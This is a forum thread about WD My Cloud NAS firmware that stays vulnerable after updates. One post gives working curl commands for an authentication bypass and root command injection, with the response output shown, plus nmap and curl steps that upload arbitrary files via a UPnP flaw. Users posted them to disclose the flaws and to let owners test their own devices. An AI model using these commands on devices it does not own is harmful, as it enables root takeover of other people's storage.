Latest firmware still vulnerable

I don’t know; I’m not a white hat security researcher. And, as I said, WD have not identified which of the nearly 100 vulnerabilites recently reported that they think they have fixed, and I’ve not seen any reports of white hats doing re-tests.

Best Practice guide? Sorry, I can’t help with that.

1 Like

Is there any more progress with this?
Or more information somewhere else?

I became aware of the issues here:

Who knows? WD aren’t telling us anything about what they’ve done to fix the raft of vulnerabilities identified.

There has been a firmware upgrade, but it gives no details of what specific CVE issues have been addressed.

WD really don’t seem to take security seriously; certainly not when communicating with customers about security concerns.

That article is from March 7th. WD released new firmware in April that was supposed to address “critical security vulnerabilities”.

Unless those organizations that reported (or someone on their own) the security vulnerabilities back in March retest the My Cloud units with the updated firmware to see if the holes have been patched we won’t know if they’ve really been patched.

https://community.wd.com/t/new-release-my-cloud-firmware-versions-4-05-00-315-2-30-165-4-19-17/202232

1 Like

Please. How downgrade fw. wd my cloud to 04.05.00-101.
After upgrading to the latest version, my hard drive does not sleep. Only a short time and he awakens in inactivity.

If one uses the forum search feature (magnifying glass icon upper right) they’ll find several past discussions on how to downgrade the single bay My Cloud to an earlier firmware version. Note however that downgrading to earlier firmware may increase the My Cloud vulnerability since it won’t have newer fixes or patches, the subject of this current discussion. Here is one such discussion on how to downgrade:

This issue isn’t really related to the subject of this discussion on the firmware being vulnerable to certain hacks. Again, use the forum search feature and search for “sleep” and you’ll find numerous discussions on how to try and deal with the single bay My Cloud when it doesn’t go into sleep mode. For example:

https://community.wd.com/search?q=sleep%20category%3A105

Thank you for answer. I’ll read.

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

New Release - My Cloud Mirror Firmware Release 2.12.127 (01/08/2019)

However there is still at least one vulnerability described in:

https://www.exploitee.rs/index.php/Western_Digital_MyCloud#network_mgr.cgi_.28added_8.2F6.2F2017.29

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other Models / Generations are affected as well, you can easily test this on your own with a Linux based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you’re getting the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.

Edit

At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to the CVE-2016-6255 in libupnp listed here as well:

https://nvd.nist.gov/vuln/detail/CVE-2016-6255

This can be simple checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  1. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  1. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  1. Verify that the file exists:

curl -i http://IP:49154/test123

Side-note:

I would love to submit this to https://support.wdc.com/ as asked in some other threads but i’m not able to create an account there since a few days. It just says “registration failed” after submitting the registration form without giving ANY information why it failed.

If some one here has an account please go ahead and submit it.

Edit

It seems the second vulnerability is even known since more then a year:

https://community.wd.com/t/security-vulnerability-cve-2016-6255-in-libupnp-allows-file-upload/176448

this topic disscus the vulnerability for the MyCloud and not for My Cloud Mirror. These are different products, so they may have different update contents/software

That’s because this is the MyCloud forum, and NOT the Mirror forum…

And the firmware really isn’t very different, especially in the gen2/v2 version.

Exactly, that’s why i had pointed out in my initial post that my observations are from a MyCloud Mirror 1st Gen:

and that it might be possible that other models / generations are affected as well by those known / existing vulnerabilities:

And most stuff on the https://www.exploitee.rs wiki page seems to have been tested on a MyCloud EX2 but the MyCloud Mirror 1st Gen was affected by all vulnerabilities as well.

As the MyCloud Mirror Changelog is containing notes about fixed vulnerabilities, where not all known are fixed as shown above this might apply for the plain MyClouds as well. Thus i assume that the Changelogs can’t be trusted fully.

So if you’re on a MyCloud (which you’re obviously are based on this forum) you can verify the two posted vulnerabilities against your device. And if the device is still vulnerable the posts are fitting here (in the “Latest firmware still vulnerable thread”) as well.

1 Like

hi there,

Regardless of whether the vulnerabilities were closed with the latest updates, I would like to summarize for myself: what are the steps to protect yourself? So I update the firmware, it is firstly and for sure.
Disabling Cloud Access was also important. But what else can / must one do? On the router? On MyCloud device? In the dashoard? Disabling UpNp as I can remember?

can we summarize :thinking:
thanks

With new reports like:

coming in i would suggest to fully disable remote access to the device and to prevent access by untrusted systems/users to the device from within your local network.

1 Like

It’s best to disconnect it from power supply, as a web page loaded in some device on a machine on the local network can exploit the backdoor just as well.

I find it hard to accept that this vulnerability should have been known to WD since June last year, and no fix has been provided. This is bad. The statements made by WD staff members in this thread (much earlier) about them taking security issues seriously sound pretty derisive.

Whew for once the first gen v4.x single bay units are not affected… :laughing:

Always a good suggestion in any event with or without a My Cloud device on the local network. If one is serious about their network security they’d restrict guest access and ensure guest systems are clean before being allowed to access the full local network. Otherwise confine those guests and their systems to a guest network that is blocked from being able to access the main local network where devices like the My Cloud reside. Most consumers however are not that anal (even if it’s good practice) about securing their local network and their devices (like the My Cloud).

Edit to add: It should be noted that the Gulftech.org vulnerability was against the 2.30.165 firmware. No word (at least i didn’t see it in the article) if the current v2.30.172 firmware released on 11/16/17 for the single bay My Cloud units is affected or if the vuln hole was closed.

Also from that Gulftech.org link comes the following which is interesting to read.

–[ 04 - D-Link DNS-320L ShareCenter

As I have mentioned earlier in this article, I found it peculiar that
the username used for the backdoor is “mydlinkBRionyg”, and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of “mydlink.cgi”. This really piqued my curiosity, and so I started using
google to try to track down some leads. After searching for the term of
“mydlink.cgi” I came across a reference to a post made by a D-Link user
regarding their D-Link DNS-320L ShareCenter NAS device.[2]

Within that post were references to file names and directory structure that
were fairly unique, and from the D-link device. But, they also perfectly
matched my WDMyCloud device. The more I looked into this the weirder it
seemed. So, I gained access to a D-Link DNS-320L ShareCenter. Once I had it
things became pretty clear to me as the D-Link DNS-320L had the same exact
hard coded backdoor and same exact file upload vulnerability that was
present within the WDMyCloud. So, it seems that the WDMyCloud software
shares a large amount of the D-Link DNS-320L code, backdoor and all. There
are also other undeniable examples such as misspelled function names and
other anomalies that match up within both the WDMyCloud and the D-Link
DNS-320L ShareCenter code.

It should be noted that unlike the WDMyCloud the D-Link DNS-320L is
currently NOT vulnerable to the backdoor and file upload issues, so you
should upgrade your DNS-320L firmware as soon as possible as the issues can
be leveraged to gain a remote root shell on the DNS-320L if you are not up
to date with your device firmware. The backdoor was first removed in the
1.0.6 firmware release. (July 28, 2014)

It is interesting to think about how before D-Link updated their software
two of the most popular NAS device families in the world, sold by two of
the most popular tech companies in the world were both vulnerable at the
same time, to the same backdoor for a while. The time frame in which both
devices were vulnerable at the same time in the wild was roughly from early
2014 to later in 2014 based on comparing firmware release note dates.

According to CVE-2017-17560 (12/12/2017), 2.30.172 is vulnerable to unauthenticated upload to anywhere in the entire filesystem, where uploaded code can be executed as root.
https://nvd.nist.gov/vuln/detail/CVE-2017-17560

I think it doesn’t get much worse than that.

Because my MyCloud is powered-off already more than 1 year since I read this posting here, unfortuntunatly I forgot how it works… if I disable the remote access will I be able to access my data on the MyCloud when I am in my home network? Also, can I then login into the dashboard the change settings for example?

No it doesn’t get much worse then that, other than the fact that WD will probably take their sweet time as in months (just like in the past) to issue a firmware update to fix this latest round of vulnerabilities.